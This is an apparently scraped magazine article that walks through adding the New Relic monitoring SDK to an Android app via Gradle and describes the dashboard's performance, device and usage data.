http://www.freesoftwaremagazine.com/comment/52
CC-MAIN-2015-48
refinedweb
1,057
50.87
Red Hat Bugzilla – Bug 1479295 Router sharding causes routes in new namespaces detection to be delayed Last modified: 2017-12-19 07:28:11 EST 3. What is the nature and description of the request? when using NAMESPACE_LABEL based router sharding, created a default template to make sure new namespaces will get the correct label, and when i create a new namespace/project it gets the correct label, but the route wouldn't work for 10-15 minutes (the pods are up few seconds after namespace creation). In an ideal situation, i would expect the routes to work right after my application is up and running. However it is observed that the default resync interval is 10 minutes which is pretty high. 4. Why does the customer need this? (List the business requirements here) Router-Sharded production environment with approximately 1500 routes.Fix the auto-sync of new namespaces created with NAMESPACE_LABEL so new routes will create as soon as new namespaces create. 5. How would the customer like to achieve this? (List the functional requirements here) The resync interval should be educed which should be safe enough for production env's having atleast 2000 routes and it shouldn't effect CPU,NETWORK and MEMORY metrics. This BZ opened as continuation of The following bugzilla bug report:, The issue and the way is was closed as WONTFIX is a bit confusing, since regular routes in openshift are admitted immediately onto all routers, why should there be any discrimination between regular routes and routers, and sharded routes (namespace labeled) and sharded routers? In our view a new route in a new namespace should be recognized immediately by a preexisting router even in a sharded environment, and not wait for a full resync which is <10minutes away by default. ccoleman@redhat.com, eparis@redhat.com What would you like to do about this. It is a duplicate of 1355711 which is closed as won't fix. Also, duplicate of: *** Bug 1479452 has been marked as a duplicate of this bug. *** Hi, can i ask what are your plans about this case? We are about to upgrade our openshift environment and it depends on router sharding.. We are working on the fix so that sharded router based on namespace or project labels notices routes immediately just like the behavior you observe on non-sharded router. Hoping to get the fix in one of the 3.6.x release. Created trello card: *** Bug 1486322 has been marked as a duplicate of this bug. *** Fix merged in origin and will be available in 3.7.1 release. Earlier releases could use the workaround by setting the router 'resync-interval' to lower value.
https://bugzilla.redhat.com/show_bug.cgi?id=1479295
CC-MAIN-2018-05
refinedweb
447
60.45
HOWTO Fetch Internet Resources Using The urllib Package¶ - Auteur - Note There is a French translation of an earlier revision of this HOWTO, available at urllib2 - Le Manuel manquant. Introduction¶. Fetching URLs¶ The simplest way to use urllib.request is as follows: import urllib.request with urllib.request.urlopen('') as response: html = response.read() If you wish to retrieve a resource via URL and store it in a temporary location, you can do so via the shutil.copyfileobj() and tempfile.NamedTemporaryFile() functions: import shutil import tempfile import urllib.request with urllib.request.urlopen('') as response: with tempfile.NamedTemporaryFile(delete=False) as tmp_file: shutil.copyfileobj(response, tmp_file) with open(tmp_file.name) as html: pass Many uses of urllib will be that simple (note that instead of an 'http:' URL we could have used a URL starting with 'ftp:', 'file:',('') with urllib.request.urlopen(req) as response:. Data¶ Sometimes you want to send data to a URL (often the URL will refer to a CGI (Common Gateway Interface) script('ascii') # data should be bytes req = urllib.request.Request(url, data) with urllib.request.urlopen(req) as response: the_page = response.read() Note that other encodings are sometimes required (e.g. for file upload from HTML forms - see HTML Specification, Form Submission for more details). If you do not pass the data argument, urllib uses a GET request.).. Headers¶ We'll discuss here one particular HTTP header, to illustrate how to add headers to your HTTP request. Some websites 1 dislike being browsed by programs, or send different versions to different browsers 2. 3. When you create a Request object you can pass a dictionary of headers in. The following example makes the same request as above, but identifies itself as a version of Internet Explorer 4. import urllib.parse import urllib.request url = '' user_agent = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)' values = {'name': 'Michael Foord', 'location': 'Northampton', 'language': 'Python' } headers = {'User-Agent': user_agent} data = urllib.parse.urlencode(values) data = data.encode('ascii') req = urllib.request.Request(url, data, headers) with urllib.request.urlopen(req) as response: the_page = response.read() The response also has two useful methods. See the section on info and geturl which comes after we have a look at what happens when things go wrong. Gestion des exceptions¶. URLError¶ Often, URLError is raised because there is no network connection (no route to the specified server), or the specified server doesn't exist. In this case, the exception raised will have a 'reason' attribute, which is a tuple containing an error code and a text error message. e.g. >>> req = urllib.request.Request('') >>> try: urllib.request.urlopen(req) ... except urllib.error.URLError as e: ... print(e.reason) ... (4, 'getaddrinfo failed') HTTPError¶ '404' (page not found), '403' (request forbidden), and '401' (authentication required). See section 10 of RFC 2616 for a reference on all the HTTP error codes. The HTTPError instance raised will have an integer 'code' attribute, which corresponds to the error sent by the server. Error Codes¶ ... Wrapping it Up¶ So if you want to be prepared for HTTPError or URLError there are two basic approaches. I prefer the second approach. Number 1¶. Number 2¶ from urllib.request import Request, urlopen from urllib.error import URLError: # everything is fine info and geturl¶ 'Content-length', 'Content-type', and so on. See the Quick Reference to HTTP Headers for a useful listing of HTTP headers with brief explanations of their meaning and use. Openers and Handlers¶. Basic Authentication¶ 'realm'. The header looks like: WWW-Authenticate: SCHEME realm="REALM". e.g. WWW-Authenticate: Basic realm="cPanel Users" The client should then retry the request with the appropriate name and password for the realm included as a header in the request. This is 'basic, DataHandler, HTTPErrorProcessor. top_level_url is in fact either a full URL (including the 'http:'. Proxies¶ urllib will auto-detect your proxy settings and use those. This is through the ProxyHandler, which is part of the normal handler chain when a proxy setting is detected. Normally that's a good thing, but there are occasions when it may not be helpful) Note Currently urllib.request does not support fetching of https locations through a proxy. However, this can be enabled by extending urllib.request as shown in the recipe 6. Note HTTP_PROXY will be ignored if a variable REQUEST_METHOD is set; see the documentation on getproxies(). Sockets and Layers¶) Notes¶ This document was reviewed and revised by John Lee. - 1 Google for example. - 2 Browser sniffing is a very bad practice for website design - building sites using web standards is much more sensible. Unfortunately a lot of sites still send different versions to different browsers. - 3 The user agent for MSIE 6 is 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)' - 4 For details of more HTTP request headers, see Quick Reference to HTTP Headers. - 5 In my case I have to use a proxy to access the internet at work. If you attempt to fetch localhost URLs through this proxy it blocks them. IE is set to use the proxy, which urllib picks up on. In order to test scripts with a localhost server, I have to prevent urllib from using the proxy. - 6 urllib opener for SSL proxy (CONNECT method): ASPN Cookbook Recipe.
https://docs.python.org/fr/3.7/howto/urllib2.html
CC-MAIN-2020-34
refinedweb
882
60.61
The following represents the normal restrictions to input and output. If exceptions are to be made, they will be explicitly stated in the Input or Output sections of the problem descriptions. Most problems will include a sample instance in order to describe the problem and demonstrate what is being asked. Sometimes, but not always, this sample is included in the Sample Input, that is always given at the end of the problem description, along with the corresponding Sample Output. Do not assume that the Sample Input includes the sample instance discussed in the problem. The compilers used are Microsoft C/C++Version 9.0.21022 and Sun JDK 1.6. All standard C/C++ libraries (including STL) and Java API are available, except for those that are deemed dangerous by contest officials (e.g., that might generate a security violation). Note the following C++ considerations: Your programs will have a limit on the amount of memory and CPU time they can use. Your program is allowed a maximum of 64MB for the data and 64MB for the stack. There is also a limit of 5MB on the amount of output your program is allowed to produce. Since the judging machine is different from the contestant machines, it is meaningless to post the CPU time limit used for judging. Please note that the CPU time limits set on the contestant machines are different from those set on the judging machine. Each submission will receive one of the following responses. The first one that the judges notice will be issued. NO - Compilation Error NO - Run-time Error NO - Time Limit Exceeded NO - Wrong Answer NO - Security Violation NO - Output Format Error NO - Excessive Output NO - Insufficient Output NO - Other - Contact Staff YES - Correct Answer "YES - Correct Answer" means that your program gave the correct output on all test cases, so you can start celebrating! (but not for too long - there are still other problems!) "NO - Other - Contact staff" is used for an incorrect submission when the judges wish to tell you more information about your submission. For example, perhaps you submitted the solution of problem E for problem F. Upon receiving this response, the contestant should submit a clarification request to the judges. The judges will then reply with a more detailed message. This response will be rare "NO - Output format error" means the output. (See "Problems Involving Floating-Point Precision" below.) "NO - Wrong answer" means at least one calculated result for at least one problem instance was incorrect. Even if you are correct on 99 problem instances but are wrong on the last one, you will get this response. (See "Problems Involving Floating-Point Precision" below.) Problems Involving Floating-Point Precision: Incorrect use of precision will only be judged as a Wrong Answer when the resulting value is not equal to the correct value. For example, if the judges' answer is 9.890, then "NO - Excessive Output" means that your program output results for more test cases than there were in the judges' test file. Note that this does not mean that there was excessive output for true test cases - this would be a presentation error. For example, if there were two test cases in the test file, and the output expected looked like "Case n: The answer is x", then the following is a presentation error: Case 1: The answer is 10 gkjh Case 2: The answer is 12 while the following is an excessive output error Case 1: The answer is 10 Case 2: The answer is 12 Case 3: The answer is "NO - Insufficient Output" means that your program did not process all of the judges test cases. Continuing with the example above, an insufficient output error would be Case 1: The answer is 10 "NO - Run-time error" means that your program crashed when run on judges' data. This includes running out of memory. "NO - Security violation" is explained later in this document. - Compilation error" means that your program did not compile. When you arrive at your assigned workstation, you should be presented with a PC^2 log in screen. Enter your team ID and password to log in. Note: If you exit PC^2, you will need to restart PC^2 again and log in. If you did not properly log out, you will not be allowed to log in. If this happens, please inform a proctor. You may use any of the text editors or IDEs installed on the workstation to write your programs. Windows calculator is also allowed. Use of any internet web browser may be cause for disqualification. Compiler/IDEs available for C, C++ and Java are: Compilers for Java: For source code submission to the judges PC2 environment is used. It is not an IDE. If you want to get familiarized with PC2, check out You can write code in one of the above IDEs, or use Notepad++, VIM editor (Windows version), or notepad. Your program source and input files should be named in the following way: where "PROB" is the problem letter you are trying to solve. The scripts executed by the "Test" button in PC^2 assume that you have used these file names. Your submission should not include more than one file unless you are using Java. For example, if you are working on problem C, then your program source can be in C.c, C.cpp, C.java or C.cs, and your input file can be C.in.dat. Java notes: If you are using multiple source files in Java, choose the main class as the "Main File" and any other required files as the "Additional Files". Remember that your file names must correspond to the public class names in the file.. Your program will be killed automatically if it uses too much CPU time. If you wish to terminate the program yourself, go to the window and press Ctrl-c (Control+c). Note: The time limits on the contestant machines may not correspond to those on the judging machines because of differences in processor speed. It is highly recommended that you use the "Test" button in PC^2 to do the testing, since this will execute your program in exactly the same way as it would be executed by the judges (on different data, of course).. You are not allowed to use debuggers in this contest. You may use output statements to provide information to help you debug your program. Note: Remember to remove this output (even if it is to stderr, cerr, or java.lang.System.err) before submitting your program. All questions about the problem set must be communicated to the judges by sending clarification requests. To do so, click on the "Clarifications" tab in the PC^2 window and click on "Request Clar". Then, select the problem, enter your request, and click "Submit". The scoreboard will be projected on the whiteboard for all contestants to see during the contest. Files can be printed using the application’s print function. Your name must be on your printout or you will not be allowed to pick it up. Suppose that you are solving the following problem (real problem descriptions will be more detailed and probably a little harder):. 1 2 3 0 2 3 4 If you are using C, you should enter the following program and save it as A.c: #include <stdio.h> int main(void) { int n; while (scanf("%d", &n) == 1 && n != 0) { printf("%d\n", n+1); } return 0; } If you are using C++, you should enter the following program and save it as A.cpp: #include <iostream.h> int main(void) { int n; while (cin >> n && n != 0) { cout << n+1 << endl; } return 0; } If you are using Java, you should enter the following program and save it as A.java: import java.util.Scanner; public class A { public static void main(String[] args) { Scanner in = new Scanner(System.in); int n = in.nextInt(); while (n != 0) { System.out.println(n+1); n = in.nextInt(); } } } You should save the input files under the names A.1.dat, A.2.dat, ... For example, you may want to enter the following into A.1.dat: 1 2 3 0. In the PC^2 window, select the problem and the language you choose, as well as the program source file. Click the "Submit" button.
http://www-personal.umd.umich.edu/~dennismv/umdcontest/general_information_for_contestants.html
CC-MAIN-2014-42
refinedweb
1,392
64.41
EthernetInterface to show how this works. The MQTT library contains an MQTTEthernet.h header, which is a wrapper around the mbed ethernet interface. To use the MQTT API with ethernet, include the following two headers: #include "MQTTEthernet.h" #include "MQTTClient.h" then instantiate an MQTT client like this: MQTTEthernet ipstack = MQTTEthernet(); MQTT::Client<MQTTEthernet, Countdown> client = MQTT::Client<MQTTEthernet, Countdown>(ipstack); Countdown is a timer class supplied in the MQTT library that is specific to mbed, so you should not need to change that. If you want to use the MQTT API with a different network stack, create an interface header similar to MQTTEthernet.h. The class you create must have the following two methods at a minimum: int read(char* buffer, int len, int timeout); int write(char* buffer, int len, int timeout); where the timeout is in milliseconds, and the return value is the number of characters read from or written to the network, or -1 on failure.
https://developer.mbed.org/teams/mqtt/code/HelloMQTT/log/49c9daf2b0ff/easy-connect.lib
CC-MAIN-2017-34
refinedweb
160
52.6
XML 1.0 and Namespaces XML 1.0 and Namespaces in XML provide a tag-based syntax for structuring data and applying markups to documents. Documents that conform to XML 1.0 and Namespaces in XML specifications may be made up of a variety of syntactic constructs such as elements, namespace declarations, attributes, processing instructions, comments, and text. This chapter provides a description of each of the structural elements in XML along with their syntax. 1.1 Elements <tagname></tagname> <tagname/> <tagname>children</tagname> Elements typically make up the majority of the content of an XML document. Every XML document has exactly one top-level element, known as the document element. Elements have a name and may also have children. These children may themselves be elements or may be processing instructions, comments, CDATA sections, or characters. The children of an element are ordered. Elements may also be annotated with attributes. The attributes of an element are unordered. An element may also have namespace declarations associated with it. The namespace declarations of an element are unordered. Elements are serialized as a pair of tags: an open tag and a close tag. The syntax for an open tag is the less-than character (<) immediately followed by the name of the element, also known as the tagname, followed by the greater-than character (>). The syntax for a close tag is the character sequence </ immediately followed by the tagname, followed by the greater-than character. The children of an element are serialized between the open and close tags of their parent. In cases when an element has no children, the element is said to be empty. A shorthand syntax may be used for empty elements consisting of the less-than character immediately followed by the tagname, followed by the character sequence />. XML does not define any element names; rather, it allows the designer of an XML document to choose what names will be used. Element names in XML are case sensitive and must begin with a letter or an underscore (_). The initial character may be followed by any number of letters, digits, periods (.), hyphens (-), underscores, or colons (:). However, because colons are used as part of the syntax for namespaces in XML, they should not be used except as described by that specification (see Section 1.2). Element names that begin with the character sequence xml, or any recapitalization thereof, are reserved by the XML specification for future use. Examples An element with children <Person> <name>Martin</name> <age>33</age> </Person> An element with a tagname of Person. The element has children with tagnames of name and age. Both of these child elements have text content. An empty element <Paid></Paid> An empty element with a tagname of Paid Empty element shorthand <Paid/> An empty element with a tagname of Paid using the shorthand syntax
http://www.informit.com/articles/article.aspx?p=24502
CC-MAIN-2016-40
refinedweb
472
56.15
When starting a new React project, one of the most difficult steps is deciding how to manage the application state. Historically, many projects have used local state, or have used libraries like Redux, and others have implemented a custom mix between the two. In this traditional way of managing state, as the application grows, we start adding more and more data to keep track of the application state, and this can lead to many bugs or invalid states, typescript can help immensely on this front as it enforces a state model to be respected, but still there is a lot of room for bugs to surface. We’re going to use another pattern of managing state that aims to solve this problem, state machines, a mathematical model of computation, that describes the behavior of a system that can only be in one state at any given time. State machines have been around for a while and, as you’ll see, using them is a more formal and deterministic way of managing state. In this post, I’m going to show you why and how to use state machines to handle state in a React application with a lot more confidence. What is XState? XState is a library that allows you to create, interpret and execute state machines and statecharts. State machines are abstract models defined by a finite number of states, events and the transition between those states. Statecharts are basically State Machines on steroids, they introduce nested states, parallel states, and extended state, among other things. When using State Machines, it’s necessary to model the entire set of States, Events and Transitions beforehand. This can seem like a tedious exercise, but it will give us total confidence in what is happening at each moment, because anything that wasn’t explicitly defined can’t happen. Now that we’ve got the concepts down, let’s get coding. Project Setup First let’s create a simple React project, for that we can use create-react-app, and setting to use the typescript template. npx create-react-app xstate-getting-started --template typescript Then, the next step is to install XState. xstate is the core package, as we need this to create our state machines. @xstate/react provides an easy way to use hooks for integration with our React components. npm install xstate @xstate/react The project is good to go, let’s get started creating our first state machine! Modeling the Machine This tutorial will use as an example a Traffic Light model, so in order to define the model, we need to go through the very basic states, events and context that a traffic light has. In its most basic form, a traffic light has 3 states, green, yellow and red. What events does it have? A traffic light loops through the 3 light colors, and nothing else. So we’ll only need a single NEXT event, that will trigger a transition of the Traffic light to the next color in the loop. We’re using Typescript on this project, since XState is written in typescript, it provides first-class support to strongly type State, Events and Context, so a wise move would be to type our domain. Events in XState are what causes the state machine to transition from its current state into its next state. Our Event type is declared as a Union Type of all the possible Events. type TrafficLightEvent = { type: "NEXT" }; The last step is to define how our state looks using something called Typestates, that is a concept where we type the possible state values, and how that value goes along with context, this can be really powerful on more complex machines, on this simple example will be used just to represent the possible state values, since the context will not be used. type TrafficLightState = | { value: "green"; context: undefined } | { value: "yellow"; context: undefined } | { value: "red"; context: undefined }; Now that everything is typed, it’s ready to create the machine. export const trafficLightMachine = createMachine({ id: "trafficLight", initial: "red", states: { green: { on: { NEXT: "yellow" }, }, yellow: { on: { NEXT: "red" }, }, red: { on: { NEXT: "green" }, }, }, }); Let’s go over a couple details that were not mentioned before: the id –the machine identifier — and the initial state value, which is what state the machine starts on. The states property is defined with the possible states, and how they should handle the events that can happen. So there is a property for each of the possible states that handle that Event, and also what state the machine should transition to, when the event is triggered. In this scenario, every state handles the NEXT event, but this does not have to be the case. For example, if the ‘on’ property is missing on the red state, the machine will be forever stuck in red, since there will be no event that can transition from it. And that’s it, that is our completed, working state machine. Visualizing our State Machine Now the cool part, let’s visualize it. XState’ has its own Visualizer tool: Our traffic light state machine It enables developers to see the machine, the possible states, and how events transition from one state to the other. In the visualizer itself, you can also click on the events, and that will show the state transitions, it’s really cool. Now, let’s take our newly made machine, and implement it on a React component. Integrating with React import React from "react"; import "./App.css"; import { useMachine } from "@xstate/react"; import { trafficLightMachine } from "./trafficLightMachine"; export const App = () => { // Typescript will infer what current and send are here // And will provide useful information about usage const [current, send] = useMachine(trafficLightMachine); return ( <div> <div /> <div> <button> send("NEXT")}>NEXT</button> </div> </div> ); }; The first action is to import the machine and useMachine hook from the @xstate/react package. The matches function is what defines what state the machine is currently in, so if it is in the red state, current.matches(‘red’) will be true.The send function acts a lot like the Dispatch does for redux, it just sends the event you want to the machine, in this case NEXT. Running it and hitting the button, the traffic light colors will change! Wrapping Up Okay! Now you know what state machines are, how they work, why they are useful, and how to implement one with React. Even though this example is extremely simple, it will give you insights into how State machines can model complex business logic, and the confidence that they can give you on your projects. You can review the sample code. Santiago Kent Related Posts - React Navigation and Redux in React Native Applications In React Native, the question of “how am I going to navigate from one screen… - React Context API Global State Management Modus Create's Javascript Community of Experts shares tips for getting the most out of the…
https://moduscreate.com/blog/xstate-react-typescript/
CC-MAIN-2021-04
refinedweb
1,150
57.4
Secure JSON Services with Play Scala and SecureSocial Last November, I traveled to Antwerp to speak at Devoxx. After my talk on HTML5 with Play Scala, Mattias Karlsson approached me and we had a chat about doing the same talk at Jfokus in Stockholm. I agreed and we began talking details after Trish and I returned to the US. I wrote this article on a plane between Denver and Seattle and will be hopping over the North Pole to Stockholm via Iceland tonight. For the past couple of weeks, I've been updating my Play More! HTML5/mobile app to add some new features. Most notably, I wanted to upgrade to Play 2.0, create JSON services and add authentication. Upgrading to Play 2.0 My attempt to upgrade to Play 2.0 involved checking out the source from GitHub, building and installing the RC1 snapshot. As I tried to upgrade my app and started getting failed imports, I turned to the internet (specifically StackOverflow) to see if it was a good idea. The first answer for that question suggested I stay with 1.x. If it's a critical project, to be finished before next March 2012, I would go with Play 1.x. If it's a less important project, which could be delayed, and that in any case won't be released before March 2012, try Play 2.0. While I didn't plan on releasing Play More! before Jfokus, I decided upgrading didn't add a whole lot to the talk. Also, I couldn't find a Play Scala 0.9.1 to Play 2.0 upgrade guide and I didn't have enough time to create one. So I decided to stick with Play 1.2.4 and add some JSON services for my iPhone client. JSON Servers I found Manuel Bernhardt's Play! Scala and JSON. This led me to Jerkson, built by the now infamous @coda. I was able to easily get things working fairly quickly and wrote the following WorkoutService.scala: package controllers.api import play.mvc.Controller import models._ import com.codahale.jerkson.Json._ object WorkoutService extends Controller { def workouts = { response.setContentTypeIfNotSet("application/json") generate(Workout.find().list()) } def edit(id: Long) = { generate(Workout.byIdWithAthleteAndComments(id)) } def create() = { var workout = params.get("workout", classOf[Workout]) Workout.create(workout) } def save(id: Option[Long]) = { var workout = params.get("workout", classOf[Workout]) Workout.update(workout) } def delete(id: Long) = { Workout.delete("id={id}").on("id" -> id).executeUpdate() } } Next, I added routes for my new API to conf/routes: GET /api/workouts api.WorkoutService.workouts GET /api/workout/{id} api.WorkoutService.edit POST /api/workout api.WorkoutService.create PUT /api/workout/{id} api.WorkoutService.save DELETE /api/workout/{id} api.WorkoutService.delete Then I created an ApiTest.scala class that verifies the first method works as expected. import play.test.FunctionalTest import play.test.FunctionalTest._ import org.junit._ class ApiTests extends FunctionalTest { @Test def testGetWorkouts() { var response = GET("/api/workouts"); assertStatus(200, response); assertContentType("application/json", response) println(response.out) } } I ran "play test", opened my browser to and clicked ApiTests -> Start to verify it worked. All the green made me happy. Finally, I wrote some CoffeeScript and jQuery to allow users to delete workouts and make sure delete functionality worked. $('#delete').click -> $.ajax type: 'POST' url: $(this).attr('rel') error: -> alert('Delete failed, please try again.') success: (data) -> location.href = "/more" I was very impressed with how easy Play made it to create JSON services and I smiled as my CoffeeScript skills got a refresher. The Friday before we left for Devoxx, I saw the module registration request for SecureSocial. SecureSocial allows you to add an authentication UI to your app that works with services based on OAuth1, OAuth2, OpenID and OpenID+OAuth hybrid protocols. It also provides a Username and Password mechanism for users that do not wish to use existing accounts in other networks. The following services are supported in this release: - Twitter (OAuth1) - Facebook (OAuth2) - Google (OpenID + OAuth Hybrid) - Yahoo (OpenID + OAuth Hybrid) - LinkedIn (OAuth1) - Foursquare (OAuth2) - MyOpenID (OpenID) - Wordpress (OpenID) - Username and Password In other words, it sounded like a dream come true and I resolved to try it once I found the time. That time found me last Monday evening and I sent a direct message to @jaliss (the module's author) via Twitter. Does Secure Social work with Play Scala? I'd like to use it in my Play More! project. Jorge responded 16 minutes later saying that he hadn't used Play Scala and he'd need to do some research. At 8 o'clock that night (1.5 hours after my original DM), Jorge had a sample working and emailed it to me. 10 minutes later I was adding a Secure trait to my project. package controllers import play.mvc._ import controllers.securesocial.SecureSocial /* * @author Jorge Aliss <jaliss@gmail.com> of Secure Social fame. */ trait Secure { self: Controller => @Before def checkAccess() { SecureSocial.DeadboltHelper.beforeRoleCheck() } def currentUser = { SecureSocial.getCurrentUser } } I configured Twitter and Username + Password as my providers by adding the following to conf/application.conf. securesocial.providers=twitter,userpass I also had to configure a number of securesocial.twitter.* properties. Next, I made sure my routes were aware of SecureSocial by adding the following to the top of conf/routes: * /auth module:securesocial Then I specified it as a dependency in conf/dependencies.yml and ran "play deps". - play -> securesocial 0.2.4 After adding "with Secure" to my Profile.scala controller, I tried to access its route and was prompted to login. Right off the bat, I was shown an error about a missing jQuery 1.5.2 file in my "javascripts" folder, so I added it and rejoiced when I was presented with a login screen. I had to add the app on Twitter to use its OAuth servers, but I was pumped when both username/password authentication worked (complete with signup!) as well as Twitter. The only issue I ran into with SecureSocial was that it didn't find the default implementation of SecureSocial's UserService.Service when running in prod mode. I was able to workaround this by adding a SecureService.scala implementation to my project and coding it to talk to my Athlete model. I didn't bother to hook in creating a new user when they logged in from Twitter, but that's something I'll want to do in the future. I was also pleased to find out customizing SecureSocial's views was a breeze. I simply copied them from the module into my app's views and voila! package services import play.db.anorm.NotAssigned import play.libs.Codec import collection.mutable.{SynchronizedMap, HashMap} import models.Athlete import securesocial.provider.{ProviderType, UserService, SocialUser, UserId} class SecureService extends UserService.Service { val activations = new HashMap[String, SocialUser] with SynchronizedMap[String, SocialUser] def find(userId: UserId): SocialUser = { val user = Athlete.find("email={email}").on("email" -> userId.id).first() user match { case Some(user) => { val socialUser = new SocialUser socialUser.id = userId socialUser.displayName = user.firstName socialUser.email = user.email socialUser.isEmailVerified = true socialUser.password = user.password socialUser } case None => { if (!userId.provider.eq(ProviderType.userpass)) { var socialUser = new SocialUser socialUser.id = userId socialUser } else { null } } } } def save(user: SocialUser) { if (find(user.id) == null) { val firstName = user.displayName val lastName = user.displayName Athlete.create(Athlete(NotAssigned, user.email, user.password, firstName, lastName)) } } def createActivation(user: SocialUser): String = { val uuid: String = Codec.UUID() activations.put(uuid, user) uuid } def activate(uuid: String): Boolean = { val user: SocialUser = activations.get(uuid).asInstanceOf[SocialUser] var result = false if (user != null) { user.isEmailVerified = true save(user) activations.remove(uuid) result = true } result } def deletePendingActivations() { activations.clear() } } Jorge was a great help in getting my authentication needs met and he even wrote a BasicAuth.scala trait to implement Basic Authentication on my JSON services. package controllers import _root_.securesocial.provider.{UserService, ProviderType, UserId} import play._ import play.mvc._ import play.libs.Crypto import controllers.securesocial.SecureSocial /* * @author Jorge Aliss <jaliss@gmail.com> of Secure Social fame. */ trait BasicAuth { self: Controller => @Before def checkAccess = { if (currentUser != null) { // this allows SecureSocial.getCurrentUser() to work. renderArgs.put("user", currentUser) Continue } val realm = Play.configuration.getProperty("securesocial.basicAuth.realm", "Unauthorized") if (request.user == null || request.password == null) { Unauthorized(realm) } else { val userId = new UserId userId.id = request.user userId.provider = ProviderType.userpass val user = UserService.find(userId) if (user == null || !Crypto.passwordHash(request.password).equals(user.password)) { Unauthorized(realm) } else { // this allows SecureSocial.getCurrentUser() to work. renderArgs.put("user", user) Continue } } } def currentUser = { SecureSocial.getCurrentUser() } } Summary My latest pass at developing with Scala and leveraging Play to build my app was a lot of fun. While there were issues with class reloading every-so-often and Scala versions with Scalate, I was able to add the features I wanted. I wasn't able to upgrade to Play 2.0, but I didn't try that hard and figured it's best to wait until its upgrade guide has been published. I'm excited to describe my latest experience to the developers at Jfokus this week. In addition, the conference has talks on Play 2.0, CoffeeScript, HTML5, Scala and Scalate. I hope to attend many of these and learn some new tricks to improve my skills and my app.Update: The Delving developers have written an article on Migration to Play 2. While it doesn't provide specific details on what they needed to change, it does have good information on how long it took and things to watch for. From (Note: Opinions expressed in this article and its replies are the opinions of their respective authors and not those of DZone, Inc.)
http://java.dzone.com/articles/secure-json-services-play
CC-MAIN-2014-10
refinedweb
1,619
53.17
Hypothetically speaking, my function returns a value and has lot of print statements (maybe 100 or more). Is there a way to run doctest +SKIP doctest doctest python mymodule.py python -m doctest mymodule.py doctest unittest doctest uses stdout, not stderr, to show messages from any failing tests. Therefore you cannot patch out stdout as this answer originally suggested - this will suppress your doctest. One option is to define functions that verbose parameter, so that you can suppress this when necessary. def foo(verbose=True): """Does whatever. >>> foo(verbose=False) """ if verbose: print('Hello world') Although you have to change the functions, this also gives you useful options when not testing. Another is to explicitly supply the appropriate def bar(print=print): """Does whatever. >>> bar(print=lambda *args, **kwargs: None) """ print('Hello world') This also requires changes to function definitions, but at least avoids changes in the bodies of those functions. A third option is to patch out def baz(): """Does whatever. >>> baz() """ print('Hello world') if __name__ == '__main__': import doctest print = lambda *args, **kwargs: None doctest.testmod() Note that this affects the outputs that doctest sees, too, so you don't include any of the python -m doctest mymodule.py, though.
https://codedump.io/share/S5PYiQoLLhXt/1/is-there-way-to-only-perform-the-doctests-ignoring-print-function-calls
CC-MAIN-2017-43
refinedweb
203
65.32
Monitoring mobile apps should be easy, all you need to do is arrange to send the data back to a server - but what server? There is enough to do without having to implement a complete monitoring system as well. The easiest option is to use someone else's server and that's what I did with my latest complicated app that involved interaction with a web site. As I needed something that could monitor a web server and an Android app I continued my exploration of the New Relic analytics and monitoring as a service system. To start off though I tried the solution out on a simple small Android app to see how it all worked. The biggest worry is that adding someone else's monitor code to your code is going to make a mess of your app. However, the New Relic instrumentation is particularly unobtrusive and easy to use. If the key test is always how easy it is to remove, the good news in this case is that it is trivial. The exact nature of getting everything set up depends on whether you are using Android or iOS, and with Android what development system you are using. The fine detail may differ but the general procedure is more or less the same. I used Android Studio and added the requisite code via Gradle. If you are new to Android Studio, and Gradle in particular, this can seem a bit scary, but in practice it is a huge simplification. If you are expecting to have to manually download a library and install it then forget it because Gradle does it all for you. All you have to do is provide the name of your app and add some lines to the build.Gradle file that you will find in the app directory. Add the lines listed in the setup instruction to the end of the file. Next you need to provide INTERNET and ACCESS_NETWORK_STATE permission to the AndroidManifest.xml file in the src directory. You can add the two lines needed just after the <manifest> tag. Of course, if the app already has these permissions you don't need to add them at all. Finally we get to the modification you need to make to the source code. This is the surprising part. All you need to do is to add: import com.newrelic.agent.android.NewRelic; and: NewRelic.withApplicationToken( "app token") .start(this.getApplication()); These lines starts the monitoring going and need to be placed in your app's onCreate method. That's it! If you need to undo the changes you have a single line of code and an import statement to remove There is only one possible mistake you could make. The "app token" that you have to enter isn't the License key that was generated when you signed up to a New Relic account. Each app that you want to monitor has a different application token which is generated when you enter the name of the app. If you use the instructions that are provided to "Add a new app" then the generated app token is shown in the instruction and all you have to do is copy and paste. If you clean the project and rebuild it then as long as you have the correct app token you will see data being collected in a few minutes. You don't have to use a real Android device; the monitoring code works with the emulator as long as there is Internet access. After adding the the code to your app you can start seeing the data flow into the monitoring dashboard. Even if you have used the same New Relic technology on a web site it comes as something of a shock to discover that you get to see the data from all of the people using your app at that moment. This may seem obvious but if you are testing things out you will only see your single instrumented test instance - remember that when you go live all of your users contribute data. The Dashboard shows the status of all of the apps you have instrumented and there is a traffic light indicator that shows the health of your app. This is mainly a function of how well it is communicating with the Internet and your backend server. It helps to remember when you are trying things out using a simulator that this dribble of information grows when you do the same thing for real! You can select any of your apps from the dashboard to display more detail. The overview shows you how much time is being taken by different operations within your app. This is an average for all of the active sessions so what it is actually showing you is a snapshot of your apps actual activity at any given time. The instrumentation tracks anything that the user does to interact with your app - from starting it up, posting a photo, updating a profile etc. You get individual data for each interaction. If you drill down you can see thread type, class and method name, percent of execution time, average number of calls per interaction and overall average execution time. You can select various parameters to narrow down the data displayed - data, app version and specific operations within your app. You can also see which are the slowest operations and notice that this is again an average across all of the active sessions so you are seeing the effects of running the app on different hardware. It is a bit like having a profiler running on a large set of machines at the same time. It is also easy to get the status of the device that the app is running on. You can see how much memory, cpu and database your app is using on the device. As well as getting performance data you can also gather some data that might be useful in marketing and guiding the future improvements to your app. You can easily find out the distribution of device types and which version of the OS are faster than others. You can even get monthly uniques to show how successful your app actually is.
http://www.i-programmer.info/projects/31-systems/7372-monitor-mobile.html
CC-MAIN-2014-42
refinedweb
1,040
68.4
